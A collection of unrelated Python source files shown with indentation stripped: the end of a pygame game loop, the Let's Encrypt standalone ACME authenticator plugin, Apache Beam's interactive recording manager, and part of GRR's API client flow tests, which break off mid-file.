elif event.type == pygame.MOUSEBUTTONDOWN:
self.player.attack(*event.pos)
if self.paused:
t = font.render(f" GAME PAUSED", True, pygame.Color("BLACK"))
screen.blit(t, (WIDTH // 2 - t.get_rect().w // 2, HEIGHT // 2 - 100 - t.get_rect().h // 2))
elif self.playing:
if self.player.hp <= 0 and not self.on_player_die_timer:
Timer(1, self.on_player_die).start()
self.on_player_die_timer = True
# checking game status
if self.level_just_finished:
if self.player.global_x > 1472 * self.current_level + 64 + self.dx:
self.current_level += 1
if self.current_level == 5:
self.start_boss_fighting()
elif self.current_level != 6:
self.start_wave()
else:
Thread(target=self.next_floor, daemon=True).start()
elif 0 < self.current_level and len(self.current_level_mobs) == 0 and not self.last_level:
self.level_finished()
self.player.key_input()
if self.player.gun:
self.player.look_at_mouse()
all_sprites.update()
particle_group.update()
CAMERA.update(self.player)
screen.fill(background_color)
all_sprites.draw(screen)
particle_group.draw(screen)
if self.player.has_welding_helmet: # это все для ПРЕДМЕТА сварочный шлем
pygame.draw.rect(screen, pygame.Color("black"), [0, 0, draw_area['l'], HEIGHT])
pygame.draw.rect(screen, pygame.Color("black"), [draw_area['r'], 0, WIDTH - draw_area['r'], HEIGHT])
pygame.draw.rect(screen, pygame.Color("black"), [draw_area['l'], 0, draw_area['r'] - draw_area['l'],
draw_area['t']])
pygame.draw.rect(screen, pygame.Color("black"),
[draw_area['l'], draw_area['b'], draw_area['r'] - draw_area['l'],
draw_area['b'] - draw_area['t']])
# screen.blit(font.render(f" HP: {self.player.hp}", True, pygame.Color("white")), (50, 20))
# screen.blit(font.render(f" Current lvl: {self.current_level}", True, pygame.Color("white")),
# (50, 40))
# screen.blit(font.render(f"FPS: {clock.get_fps()}", True, pygame.Color("white")), (50, 60))
# screen.blit(
# font.render(f" ARMOR: {self.player.armor} DMG: {self.player.damage}", True, pygame.Color("white")),
# (50, 80))
# screen.blit(font.render(f" prt: {self.player.protection}", True, pygame.Color("white")),
# (50, 100))
self.bar_group.update()
items_text.update()
# updating buttons
self.buttons_group.update()
self.buttons_group.draw(screen)
for i in self.transitioning:
i()
for i in delete_later:
if i in self.current_level_mobs:
self.current_level_mobs.remove(i)
if i.hitbox:
i.hitbox.kill()
i.kill()
delete_later.clear()
pygame.display.flip()
clock.tick(FPS)
def run(chosen_hero):
global game_instance
game_instance = Game(chosen_hero)
game_instance.run()
|
standalone.py
|
"""Standalone Authenticator."""
import argparse
import collections
import logging
import random
import socket
import threading
import OpenSSL
import six
import zope.interface
from acme import challenges
from acme import crypto_util as acme_crypto_util
from acme import standalone as acme_standalone
from letsencrypt import errors
from letsencrypt import interfaces
from letsencrypt.plugins import common
from letsencrypt.plugins import util
logger = logging.getLogger(__name__)
class ServerManager(object):
"""Standalone servers manager.
Manager for `ACMEServer` and `ACMETLSServer` instances.
`certs` and `simple_http_resources` correspond to
`acme.crypto_util.SSLSocket.certs` and
`acme.crypto_util.SSLSocket.simple_http_resources` respectively. All
created servers share the same certificates and resources, so if
you're running both TLS and non-TLS instances, HTTP01 handlers
will serve the same URLs!
"""
_Instance = collections.namedtuple("_Instance", "server thread")
def __init__(self, certs, simple_http_resources):
self._instances = {}
self.certs = certs
self.simple_http_resources = simple_http_resources
def run(self, port, challenge_type):
"""Run ACME server on specified ``port``.
This method is idempotent, i.e. all calls with the same pair of
``(port, challenge_type)`` will reuse the same server.
:param int port: Port to run the server on.
:param challenge_type: Subclass of `acme.challenges.Challenge`,
either `acme.challenge.HTTP01` or `acme.challenges.DVSNI`.
:returns: Server instance.
:rtype: ACMEServerMixin
"""
assert challenge_type in (challenges.DVSNI, challenges.HTTP01)
if port in self._instances:
return self._instances[port].server
address = ("", port)
try:
if challenge_type is challenges.DVSNI:
server = acme_standalone.DVSNIServer(address, self.certs)
else: # challenges.HTTP01
server = acme_standalone.HTTP01Server(
address, self.simple_http_resources)
except socket.error as error:
raise errors.StandaloneBindError(error, port)
thread = threading.Thread(
# pylint: disable=no-member
target=server.serve_forever)
thread.start()
# if port == 0, then random free port on OS is taken
# pylint: disable=no-member
real_port = server.socket.getsockname()[1]
self._instances[real_port] = self._Instance(server, thread)
return server
def stop(self, port):
"""Stop ACME server running on the specified ``port``.
:param int port:
"""
instance = self._instances[port]
logger.debug("Stopping server at %s:%d...",
*instance.server.socket.getsockname()[:2])
instance.server.shutdown()
instance.thread.join()
del self._instances[port]
def running(self):
"""Return all running instances.
Once the server is stopped using `stop`, it will not be
returned.
:returns: Mapping from ``port`` to ``server``.
:rtype: tuple
"""
return dict((port, instance.server) for port, instance
in six.iteritems(self._instances))
SUPPORTED_CHALLENGES = set([challenges.DVSNI, challenges.HTTP01])
def supported_challenges_validator(data):
"""Supported challenges validator for the `argparse`.
It should be passed as `type` argument to `add_argument`.
"""
challs = data.split(",")
unrecognized = [name for name in challs
if name not in challenges.Challenge.TYPES]
if unrecognized:
raise argparse.ArgumentTypeError(
"Unrecognized challenges: {0}".format(", ".join(unrecognized)))
choices = set(chall.typ for chall in SUPPORTED_CHALLENGES)
if not set(challs).issubset(choices):
raise argparse.ArgumentTypeError(
"Plugin does not support the following (valid) "
"challenges: {0}".format(", ".join(set(challs) - choices)))
return data
class Authenticator(common.Plugin):
"""Standalone Authenticator.
This authenticator creates its own ephemeral TCP listener on the
necessary port in order to respond to incoming DVSNI and HTTP01
challenges from the certificate authority. Therefore, it does not
rely on any existing server program.
"""
zope.interface.implements(interfaces.IAuthenticator)
zope.interface.classProvides(interfaces.IPluginFactory)
description = "Automatically use a temporary webserver"
def __init__(self, *args, **kwargs):
super(Authenticator, self).__init__(*args, **kwargs)
# one self-signed key for all DVSNI and HTTP01 certificates
self.key = OpenSSL.crypto.PKey()
self.key.generate_key(OpenSSL.crypto.TYPE_RSA, bits=2048)
# TODO: generate only when the first HTTP01 challenge is solved
self.simple_http_cert = acme_crypto_util.gen_ss_cert(
self.key, domains=["temp server"])
self.served = collections.defaultdict(set)
# Stuff below is shared across threads (i.e. servers read
# values, main thread writes). Due to the nature of CPython's
# GIL, the operations are safe, c.f.
# https://docs.python.org/2/faq/library.html#what-kinds-of-global-value-mutation-are-thread-safe
self.certs = {}
self.simple_http_resources = set()
self.servers = ServerManager(self.certs, self.simple_http_resources)
@classmethod
def add_parser_arguments(cls, add):
add("supported-challenges", help="Supported challenges, "
"order preferences are randomly chosen.",
type=supported_challenges_validator, default=",".join(
sorted(chall.typ for chall in SUPPORTED_CHALLENGES)))
@property
def supported_challenges(self):
"""Challenges supported by this plugin."""
return set(challenges.Challenge.TYPES[name] for name in
self.conf("supported-challenges").split(","))
@property
def _necessary_ports(self):
necessary_ports = set()
if challenges.HTTP01 in self.supported_challenges:
necessary_ports.add(self.config.http01_port)
if challenges.DVSNI in self.supported_challenges:
necessary_ports.add(self.config.dvsni_port)
return necessary_ports
def more_info(self): # pylint: disable=missing-docstring
return("This authenticator creates its own ephemeral TCP listener "
"on the necessary port in order to respond to incoming DVSNI "
"and HTTP01 challenges from the certificate authority. "
"Therefore, it does not rely on any existing server program.")
def prepare(self): # pylint: disable=missing-docstring
pass
def get_chall_pref(self, domain):
# pylint: disable=unused-argument,missing-docstring
chall_pref = list(self.supported_challenges)
random.shuffle(chall_pref) # 50% for each challenge
return chall_pref
def perform(self, achalls): # pylint: disable=missing-docstring
if any(util.already_listening(port) for port in self._necessary_ports):
raise errors.MisconfigurationError(
"At least one of the (possibly) required ports is "
"already taken.")
try:
return self.perform2(achalls)
except errors.StandaloneBindError as error:
display = zope.component.getUtility(interfaces.IDisplay)
if error.socket_error.errno == socket.errno.EACCES:
display.notification(
"Could not bind TCP port {0} because you don't have "
"the appropriate permissions (for example, you "
"aren't running this program as "
"root).".format(error.port))
elif error.socket_error.errno == socket.errno.EADDRINUSE:
display.notification(
"Could not bind TCP port {0} because it is already in "
"use by another process on this system (such as a web "
"server). Please stop the program in question and then "
"try again.".format(error.port))
else:
raise # XXX: How to handle unknown errors in binding?
def perform2(self, achalls):
"""Perform achallenges without IDisplay interaction."""
responses = []
for achall in achalls:
if isinstance(achall.chall, challenges.HTTP01):
server = self.servers.run(
self.config.http01_port, challenges.HTTP01)
response, validation = achall.response_and_validation()
self.simple_http_resources.add(
acme_standalone.HTTP01RequestHandler.HTTP01Resource(
chall=achall.chall, response=response,
validation=validation))
cert = self.simple_http_cert
domain = achall.domain
else: # DVSNI
server = self.servers.run(self.config.dvsni_port, challenges.DVSNI)
response, cert, _ = achall.gen_cert_and_response(self.key)
domain = response.z_domain
self.certs[domain] = (self.key, cert)
self.served[server].add(achall)
responses.append(response)
return responses
def cleanup(self, achalls): # pylint: disable=missing-docstring
# reduce self.served and close servers if none challenges are served
for server, server_achalls in self.served.items():
for achall in achalls:
if achall in server_achalls:
server_achalls.remove(achall)
for port, server in six.iteritems(self.servers.running()):
if not self.served[server]:
self.servers.stop(port)
|
recording_manager.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import threading
import time
import warnings
import pandas as pd
import apache_beam as beam
from apache_beam.dataframe.frame_base import DeferredBase
from apache_beam.portability.api.beam_runner_api_pb2 import TestStreamPayload
from apache_beam.runners.interactive import background_caching_job as bcj
from apache_beam.runners.interactive import interactive_environment as ie
from apache_beam.runners.interactive import interactive_runner as ir
from apache_beam.runners.interactive import pipeline_fragment as pf
from apache_beam.runners.interactive import utils
from apache_beam.runners.interactive.caching.cacheable import CacheKey
from apache_beam.runners.runner import PipelineState
_LOGGER = logging.getLogger(__name__)
class ElementStream:
"""A stream of elements from a given PCollection."""
def __init__(
self,
pcoll, # type: beam.pvalue.PCollection
var, # type: str
cache_key, # type: str
max_n, # type: int
max_duration_secs # type: float
):
self._pcoll = pcoll
self._cache_key = cache_key
self._pipeline = ie.current_env().user_pipeline(pcoll.pipeline)
self._var = var
self._n = max_n
self._duration_secs = max_duration_secs
# A small state variable that when True, indicates that no more new elements
# will be yielded if read() is called again.
self._done = False
@property
def var(self):
# type: () -> str
"""Returns the variable named that defined this PCollection."""
return self._var
@property
def pcoll(self):
# type: () -> beam.pvalue.PCollection
"""Returns the PCollection that supplies this stream with data."""
return self._pcoll
@property
def cache_key(self):
# type: () -> str
"""Returns the cache key for this stream."""
return self._cache_key
def display_id(self, suffix):
# type: (str) -> str
"""Returns a unique id able to be displayed in a web browser."""
return utils.obfuscate(self._cache_key, suffix)
def is_computed(self):
# type: () -> boolean
"""Returns True if no more elements will be recorded."""
return self._pcoll in ie.current_env().computed_pcollections
def is_done(self):
# type: () -> boolean
"""Returns True if no more new elements will be yielded."""
return self._done
def read(self, tail=True):
# type: (boolean) -> Any
"""Reads the elements currently recorded."""
# Get the cache manager and wait until the file exists.
cache_manager = ie.current_env().get_cache_manager(self._pipeline)
# Retrieve the coder for the particular PCollection which will be used to
# decode elements read from cache.
coder = cache_manager.load_pcoder('full', self._cache_key)
# Read the elements from the cache.
# Import limiters here to prevent a circular import.
from apache_beam.runners.interactive.options.capture_limiters import CountLimiter
from apache_beam.runners.interactive.options.capture_limiters import ProcessingTimeLimiter
reader, _ = cache_manager.read('full', self._cache_key, tail=tail)
# Because a single TestStreamFileRecord can yield multiple elements, we
# limit the count again here in the to_element_list call.
#
# There are two ways of exiting this loop either a limiter was triggered or
# all elements from the cache were read. In the latter situation, it may be
# the case that the pipeline was still running. Thus, another invocation of
# `read` will yield new elements.
count_limiter = CountLimiter(self._n)
time_limiter = ProcessingTimeLimiter(self._duration_secs)
limiters = (count_limiter, time_limiter)
for e in utils.to_element_list(reader,
coder,
include_window_info=True,
n=self._n,
include_time_events=True):
# From the to_element_list we either get TestStreamPayload.Events if
# include_time_events or decoded elements from the reader. Make sure we
# only count the decoded elements to break early.
if isinstance(e, TestStreamPayload.Event):
time_limiter.update(e)
else:
count_limiter.update(e)
yield e
if any(l.is_triggered() for l in limiters):
break
# A limiter being triggered means that we have fulfilled the user's request.
# This implies that reading from the cache again won't yield any new
# elements. WLOG, this applies to the user pipeline being terminated.
if any(l.is_triggered()
for l in limiters) or ie.current_env().is_terminated(self._pipeline):
self._done = True
class Recording:
"""A group of PCollections from a given pipeline run."""
def __init__(
self,
user_pipeline, # type: beam.Pipeline
pcolls, # type: List[beam.pvalue.PCollection]
result, # type: beam.runner.PipelineResult
max_n, # type: int
max_duration_secs, # type: float
):
self._user_pipeline = user_pipeline
self._result = result
self._result_lock = threading.Lock()
self._pcolls = pcolls
pcoll_var = lambda pcoll: {v: k
for k, v in utils.pcoll_by_name().items()}.get(
pcoll, None)
self._streams = {
pcoll: ElementStream(
pcoll,
pcoll_var(pcoll),
CacheKey.from_pcoll(pcoll_var(pcoll), pcoll).to_str(),
max_n,
max_duration_secs)
for pcoll in pcolls
}
self._start = time.time()
self._duration_secs = max_duration_secs
self._set_computed = bcj.is_cache_complete(str(id(user_pipeline)))
# Run a separate thread for marking the PCollections done. This is because
# the pipeline run may be asynchronous.
self._mark_computed = threading.Thread(target=self._mark_all_computed)
self._mark_computed.daemon = True
self._mark_computed.start()
def _mark_all_computed(self):
# type: () -> None
"""Marks all the PCollections upon a successful pipeline run."""
if not self._result:
return
while not PipelineState.is_terminal(self._result.state):
with self._result_lock:
bcj = ie.current_env().get_background_caching_job(self._user_pipeline)
if bcj and bcj.is_done():
self._result.wait_until_finish()
elif time.time() - self._start >= self._duration_secs:
self._result.cancel()
self._result.wait_until_finish()
elif all(s.is_done() for s in self._streams.values()):
self._result.cancel()
self._result.wait_until_finish()
time.sleep(0.1)
# Mark the PCollection as computed so that Interactive Beam wouldn't need to
# re-compute.
if self._result.state is PipelineState.DONE and self._set_computed:
ie.current_env().mark_pcollection_computed(self._pcolls)
def is_computed(self):
# type: () -> boolean
"""Returns True if all PCollections are computed."""
return all(s.is_computed() for s in self._streams.values())
def stream(self, pcoll):
# type: (beam.pvalue.PCollection) -> ElementStream
"""Returns an ElementStream for a given PCollection."""
return self._streams[pcoll]
def computed(self):
# type: () -> None
"""Returns all computed ElementStreams."""
return {p: s for p, s in self._streams.items() if s.is_computed()}
def uncomputed(self):
# type: () -> None
"""Returns all uncomputed ElementStreams."""
return {p: s for p, s in self._streams.items() if not s.is_computed()}
def cancel(self):
# type: () -> None
"""Cancels the recording."""
with self._result_lock:
self._result.cancel()
def wait_until_finish(self):
# type: () -> None
"""Waits until the pipeline is done and returns the final state.
This also marks any PCollections as computed right away if the pipeline is
successful.
"""
if not self._result:
return beam.runners.runner.PipelineState.DONE
self._mark_computed.join()
return self._result.state
def describe(self):
# type: () -> dict[str, int]
"""Returns a dictionary describing the cache and recording."""
cache_manager = ie.current_env().get_cache_manager(self._user_pipeline)
size = sum(
cache_manager.size('full', s.cache_key) for s in self._streams.values())
return {'size': size, 'duration': self._duration_secs}
class RecordingManager:
"""Manages recordings of PCollections for a given pipeline."""
def __init__(self, user_pipeline, pipeline_var=None, test_limiters=None):
# type: (beam.Pipeline, str, list[Limiter]) -> None
self.user_pipeline = user_pipeline # type: beam.Pipeline
self.pipeline_var = pipeline_var if pipeline_var else '' # type: str
self._recordings = set() # type: set[Recording]
self._start_time_sec = 0 # type: float
self._test_limiters = test_limiters if test_limiters else []
def _watch(self, pcolls):
# type: (List[beam.pvalue.PCollection]) -> None
"""Watch any pcollections not being watched.
This allows for the underlying caching layer to identify the PCollection as
something to be cached.
"""
watched_pcollections = set()
watched_dataframes = set()
for watching in ie.current_env().watching():
for _, val in watching:
if isinstance(val, beam.pvalue.PCollection):
watched_pcollections.add(val)
elif isinstance(val, DeferredBase):
watched_dataframes.add(val)
# Convert them one-by-one to generate a unique label for each. This allows
# caching at a more fine-grained granularity.
#
# TODO(BEAM-12388): investigate the mixing pcollections in multiple
# pipelines error when using the default label.
for df in watched_dataframes:
pcoll, _ = utils.deferred_df_to_pcollection(df)
watched_pcollections.add(pcoll)
for pcoll in pcolls:
if pcoll not in watched_pcollections:
ie.current_env().watch(
{'anonymous_pcollection_{}'.format(id(pcoll)): pcoll})
def _clear(self):
# type: () -> None
"""Clears the recording of all non-source PCollections."""
cache_manager = ie.current_env().get_cache_manager(self.user_pipeline)
# Only clear the PCollections that aren't being populated from the
# BackgroundCachingJob.
computed = ie.current_env().computed_pcollections
cacheables = [
c for c in utils.cacheables().values()
if c.pcoll.pipeline is self.user_pipeline and c.pcoll not in computed
]
all_cached = set(str(c.to_key()) for c in cacheables)
source_pcolls = getattr(cache_manager, 'capture_keys', set())
to_clear = all_cached - source_pcolls
self._clear_pcolls(cache_manager, set(to_clear))
def _clear_pcolls(self, cache_manager, pcolls):
for pc in pcolls:
cache_manager.clear('full', pc)
def clear(self):
# type: () -> None
"""Clears all cached PCollections for this RecordingManager."""
cache_manager = ie.current_env().get_cache_manager(self.user_pipeline)
if cache_manager:
cache_manager.cleanup()
def cancel(self):
# type: (None) -> None
"""Cancels the current background recording job."""
bcj.attempt_to_cancel_background_caching_job(self.user_pipeline)
for r in self._recordings:
r.wait_until_finish()
self._recordings = set()
# The recordings rely on a reference to the BCJ to correctly finish. So we
# evict the BCJ after they complete.
ie.current_env().evict_background_caching_job(self.user_pipeline)
def describe(self):
# type: () -> dict[str, int]
"""Returns a dictionary describing the cache and recording."""
cache_manager = ie.current_env().get_cache_manager(self.user_pipeline)
capture_size = getattr(cache_manager, 'capture_size', 0)
descriptions = [r.describe() for r in self._recordings]
size = sum(d['size'] for d in descriptions) + capture_size
start = self._start_time_sec
bcj = ie.current_env().get_background_caching_job(self.user_pipeline)
if bcj:
state = bcj.state
else:
state = PipelineState.STOPPED
return {
'size': size,
'start': start,
'state': state,
'pipeline_var': self.pipeline_var
}
def record_pipeline(self):
# type: () -> bool
"""Starts a background caching job for this RecordingManager's pipeline."""
runner = self.user_pipeline.runner
if isinstance(runner, ir.InteractiveRunner):
runner = runner._underlying_runner
# Make sure that sources without a user reference are still cached.
ie.current_env().add_user_pipeline(self.user_pipeline)
utils.watch_sources(self.user_pipeline)
# Attempt to run background caching job to record any sources.
if ie.current_env().is_in_ipython:
warnings.filterwarnings(
'ignore',
'options is deprecated since First stable release. References to '
'<pipeline>.options will not be supported',
category=DeprecationWarning)
if bcj.attempt_to_run_background_caching_job(
runner,
self.user_pipeline,
options=self.user_pipeline.options,
limiters=self._test_limiters):
self._start_time_sec = time.time()
return True
return False
def record(self, pcolls, max_n, max_duration):
# type: (List[beam.pvalue.PCollection], int, Union[int,str]) -> Recording
"""Records the given PCollections."""
# Assert that all PCollection come from the same user_pipeline.
for pcoll in pcolls:
assert pcoll.pipeline is self.user_pipeline, (
'{} belongs to a different user-defined pipeline ({}) than that of'
' other PCollections ({}).'.format(
pcoll, pcoll.pipeline, self.user_pipeline))
if isinstance(max_duration, str) and max_duration != 'inf':
max_duration_secs = pd.to_timedelta(max_duration).total_seconds()
else:
max_duration_secs = max_duration
# Make sure that all PCollections to be shown are watched. If a PCollection
# has not been watched, make up a variable name for that PCollection and
# watch it. No validation is needed here because the watch logic can handle
# arbitrary variables.
self._watch(pcolls)
self.record_pipeline()
# Get the subset of computed PCollections. These do not to be recomputed.
computed_pcolls = set(
pcoll for pcoll in pcolls
if pcoll in ie.current_env().computed_pcollections)
# Start a pipeline fragment to start computing the PCollections.
uncomputed_pcolls = set(pcolls).difference(computed_pcolls)
if uncomputed_pcolls:
# Clear the cache of the given uncomputed PCollections because they are
# incomplete.
self._clear()
warnings.filterwarnings(
'ignore',
'options is deprecated since First stable release. References to '
'<pipeline>.options will not be supported',
category=DeprecationWarning)
pf.PipelineFragment(list(uncomputed_pcolls),
self.user_pipeline.options).run()
result = ie.current_env().pipeline_result(self.user_pipeline)
else:
result = None
recording = Recording(
self.user_pipeline, pcolls, result, max_n, max_duration_secs)
self._recordings.add(recording)
return recording
def read(self, pcoll_name, pcoll, max_n, max_duration_secs):
# type: (str, beam.pvalue.PValue, int, float) -> Union[None, ElementStream]
"""Reads an ElementStream of a computed PCollection.
Returns None if an error occurs. The caller is responsible of validating if
the given pcoll_name and pcoll can identify a watched and computed
PCollection without ambiguity in the notebook.
"""
try:
cache_key = CacheKey.from_pcoll(pcoll_name, pcoll).to_str()
return ElementStream(
pcoll, pcoll_name, cache_key, max_n, max_duration_secs)
except (KeyboardInterrupt, SystemExit):
raise
except Exception as e:
# Caller should handle all validations. Here to avoid redundant
# validations, simply log errors if caller fails to do so.
_LOGGER.error(str(e))
return None
|
flow_test.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""Tests for API client and flows-related API calls."""
import io
import threading
import time
from typing import Iterable
import zipfile
from absl import app
from grr_api_client import errors as grr_api_errors
from grr_response_core.lib import rdfvalue
from grr_response_core.lib.parsers import abstract as parser
from grr_response_core.lib.rdfvalues import artifacts as rdf_artifacts
from grr_response_core.lib.rdfvalues import client as rdf_client
from grr_response_core.lib.rdfvalues import client_action as rdf_client_action
from grr_response_core.lib.rdfvalues import client_fs as rdf_client_fs
from grr_response_core.lib.rdfvalues import paths as rdf_paths
from grr_response_core.lib.util import compatibility
from grr_response_proto.api import flow_pb2
from grr_response_server import data_store
from grr_response_server import flow_base
from grr_response_server.databases import db
from grr_response_server.flows.general import collectors
from grr_response_server.flows.general import processes
from grr_response_server.gui import api_integration_test_lib
from grr_response_server.rdfvalues import flow_objects as rdf_flow_objects
from grr_response_server.rdfvalues import objects as rdf_objects
from grr.test_lib import action_mocks
from grr.test_lib import flow_test_lib
from grr.test_lib import parser_test_lib
from grr.test_lib import test_lib
from grr.test_lib import vfs_test_lib
class ApiClientLibFlowTest(api_integration_test_lib.ApiIntegrationTest):
"""Tests flows-related part of GRR Python API client library."""
def testSearchWithNoClients(self):
clients = list(self.api.SearchClients(query="."))
self.assertEqual(clients, [])
def testSearchClientsWith2Clients(self):
client_ids = sorted(self.SetupClients(2))
clients = sorted(
self.api.SearchClients(query="."), key=lambda c: c.client_id)
self.assertLen(clients, 2)
for i in range(2):
self.assertEqual(clients[i].client_id, client_ids[i])
self.assertEqual(clients[i].data.urn, "aff4:/%s" % client_ids[i])
def testListFlowsFromClientRef(self):
client_id = self.SetupClient(0)
flow_id = flow_test_lib.StartFlow(
processes.ListProcesses, client_id=client_id)
flows = list(self.api.Client(client_id=client_id).ListFlows())
self.assertLen(flows, 1)
self.assertEqual(flows[0].client_id, client_id)
self.assertEqual(flows[0].flow_id, flow_id)
self.assertEqual(flows[0].data.flow_id, flow_id)
def testListFlowsFromClientObject(self):
client_id = self.SetupClient(0)
flow_id = flow_test_lib.StartFlow(
processes.ListProcesses, client_id=client_id)
client = self.api.Client(client_id=client_id).Get()
flows = list(client.ListFlows())
self.assertLen(flows, 1)
self.assertEqual(flows[0].client_id, client_id)
self.assertEqual(flows[0].flow_id, flow_id)
self.assertEqual(flows[0].data.flow_id, flow_id)
def testCreateFlowWithUnicodeArguments(self):
unicode_str = "🐊 🐢 🦎 🐍"
client_id = self.SetupClient(0)
args = processes.ListProcessesArgs(
filename_regex=unicode_str, fetch_binaries=True)
client_ref = self.api.Client(client_id=client_id)
result_flow = client_ref.CreateFlow(
name=processes.ListProcesses.__name__, args=args.AsPrimitiveProto())
got_flow = client_ref.Flow(flow_id=result_flow.flow_id).Get()
self.assertEqual(got_flow.args.filename_regex, unicode_str)
def testCreateFlowFromClientRef(self):
client_id = self.SetupClient(0)
args = processes.ListProcessesArgs(
filename_regex="blah", fetch_binaries=True)
flows = data_store.REL_DB.ReadAllFlowObjects(client_id)
self.assertEmpty(flows)
client_ref = self.api.Client(client_id=client_id)
client_ref.CreateFlow(
name=processes.ListProcesses.__name__, args=args.AsPrimitiveProto())
flows = data_store.REL_DB.ReadAllFlowObjects(client_id)
self.assertLen(flows, 1)
self.assertEqual(flows[0].args, args)
def testCreateFlowFromClientObject(self):
client_id = self.SetupClient(0)
args = processes.ListProcessesArgs(
filename_regex="blah", fetch_binaries=True)
flows = data_store.REL_DB.ReadAllFlowObjects(client_id)
self.assertEmpty(flows)
client = self.api.Client(client_id=client_id).Get()
client.CreateFlow(
name=processes.ListProcesses.__name__, args=args.AsPrimitiveProto())
flows = data_store.REL_DB.ReadAllFlowObjects(client_id)
self.assertLen(flows, 1)
self.assertEqual(flows[0].args, args)
def testRunInterrogateFlow(self):
client_id = self.SetupClient(0)
client_ref = self.api.Client(client_id=client_id)
result_flow = client_ref.Interrogate()
self.assertEqual(result_flow.data.client_id, client_id)
self.assertEqual(result_flow.data.name, "Interrogate")
flows = data_store.REL_DB.ReadAllFlowObjects(client_id)
self.assertLen(flows, 1)
self.assertEqual(flows[0].flow_class_name, "Interrogate")
def testListResultsForListProcessesFlow(self):
process = rdf_client.Process(
pid=2,
ppid=1,
cmdline=["cmd.exe"],
exe="c:\\windows\\cmd.exe",
ctime=1333718907167083,
RSS_size=42)
client_id = self.SetupClient(0)
flow_id = flow_test_lib.TestFlowHelper(
compatibility.GetName(processes.ListProcesses),
client_id=client_id,
client_mock=action_mocks.ListProcessesMock([process]),
creator=self.test_username)
result_flow = self.api.Client(client_id=client_id).Flow(flow_id)
results = list(result_flow.ListResults())
self.assertLen(results, 1)
self.assertEqual(process.AsPrimitiveProto(), results[0].payload)
def testListParsedFlowResults(self):
client_id = self.SetupClient(0)
flow_id = "4815162342ABCDEF"
flow = rdf_flow_objects.Flow()
flow.client_id = client_id
flow.flow_id = flow_id
flow.flow_class_name = collectors.ArtifactCollectorFlow.__name__
flow.args = rdf_artifacts.ArtifactCollectorFlowArgs(apply_parsers=False)
flow.persistent_data = {"knowledge_base": rdf_client.KnowledgeBase()}
data_store.REL_DB.WriteFlowObject(flow)
result = rdf_flow_objects.FlowResult()
result.client_id = client_id
result.flow_id = flow_id
result.tag = "artifact:Echo"
response = rdf_client_action.ExecuteResponse()
response.stderr = "Lorem ipsum.".encode("utf-8")
result.payload = response
data_store.REL_DB.WriteFlowResults([result])
response = rdf_client_action.ExecuteResponse()
response.stderr = "Dolor sit amet.".encode("utf-8")
result.payload = response
data_store.REL_DB.WriteFlowResults([result])
class StderrToStdoutParser(
parser.SingleResponseParser[rdf_client_action.ExecuteResponse]):
supported_artifacts = ["Echo"]
def ParseResponse(
self,
knowledge_base: rdf_client.KnowledgeBase,
response: rdf_client_action.ExecuteResponse,
) -> Iterable[rdf_client_action.ExecuteResponse]:
del knowledge_base # Unused.
if not isinstance(response, rdf_client_action.ExecuteResponse):
raise TypeError(f"Unexpected response type: {type(response)}")
parsed_response = rdf_client_action.ExecuteResponse()
parsed_response.stdout = response.stderr
return [parsed_response]
with parser_test_lib._ParserContext("StderrToStdout", StderrToStdoutParser):
results = self.api.Client(client_id).Flow(flow_id).ListParsedResults()
stdouts = [result.payload.stdout.decode("utf-8") for result in results]
self.assertLen(stdouts, 2)
self.assertEqual(stdouts[0], "Lorem ipsum.")
self.assertEqual(stdouts[1], "Dolor sit amet.")
def testListFlowApplicableParsers(self):
client_id = self.SetupClient(0)
flow_id = "4815162342ABCDEF"
flow = rdf_flow_objects.Flow()
flow.client_id = client_id
flow.flow_id = flow_id
flow.flow_class_name = collectors.ArtifactCollectorFlow.__name__
flow.args = rdf_artifacts.ArtifactCollectorFlowArgs(apply_parsers=False)
data_store.REL_DB.WriteFlowObject(flow)
result = rdf_flow_objects.FlowResult()
result.client_id = client_id
result.flow_id = flow_id
result.tag = "artifact:Fake"
result.payload = rdf_client_action.ExecuteResponse(stderr=b"foobar")
data_store.REL_DB.WriteFlowResults([result])
class FakeParser(parser.SingleResponseParser[None]):
supported_artifacts = ["Fake"]
def ParseResponse(
self,
knowledge_base: rdf_client.KnowledgeBase,
response: rdfvalue.RDFValue,
) -> Iterable[None]:
raise NotImplementedError()
with parser_test_lib._ParserContext("Fake", FakeParser):
results = self.api.Client(client_id).Flow(flow_id).ListApplicableParsers()
self.assertLen(results.parsers, 1)
result = results.parsers[0]
self.assertEqual(result.name, "Fake")
self.assertEqual(result.type, flow_pb2.ApiParserDescriptor.SINGLE_RESPONSE)
def testWaitUntilDoneReturnsWhenFlowCompletes(self):
client_id = self.SetupClient(0)
flow_id = flow_test_lib.StartFlow(
processes.ListProcesses, client_id=client_id)
result_flow = self.api.Client(client_id=client_id).Flow(flow_id).Get()
self.assertEqual(result_flow.data.state, result_flow.data.RUNNING)
def ProcessFlow():
time.sleep(1)
client_mock = action_mocks.ListProcessesMock([])
flow_test_lib.FinishAllFlowsOnClient(client_id, client_mock=client_mock)
t = threading.Thread(target=ProcessFlow)
t.start()
try:
f = result_flow.WaitUntilDone()
self.assertEqual(f.data.state, f.data.TERMINATED)
finally:
t.join()
def testWaitUntilDoneRaisesWhenFlowFails(self):
client_id = self.SetupClient(0)
flow_id = flow_test_lib.StartFlow(
processes.ListProcesses, client_id=client_id)
result_flow = self.api.Client(client_id=client_id).Flow(flow_id).Get()
def ProcessFlow():
time.sleep(1)
flow_base.TerminateFlow(client_id, flow_id, "")
t = threading.Thread(target=ProcessFlow)
t.start()
try:
with self.assertRaises(grr_api_errors.FlowFailedError):
result_flow.WaitUntilDone()
finally:
t.join()
def testWaitUntilDoneRasiesWhenItTimesOut(self):
client_id = self.SetupClient(0)
flow_id = flow_test_lib.StartFlow(
processes.ListProcesses, client_id=client_id)
result_flow = self.api.Client(client_id=client_id).Flow(flow_id).Get()
with self.assertRaises(grr_api_errors.PollTimeoutError):
result_flow.WaitUntilDone(timeout=1)
def _SetupFlowWithStatEntryResults(self):
client_id = self.SetupClient(0)
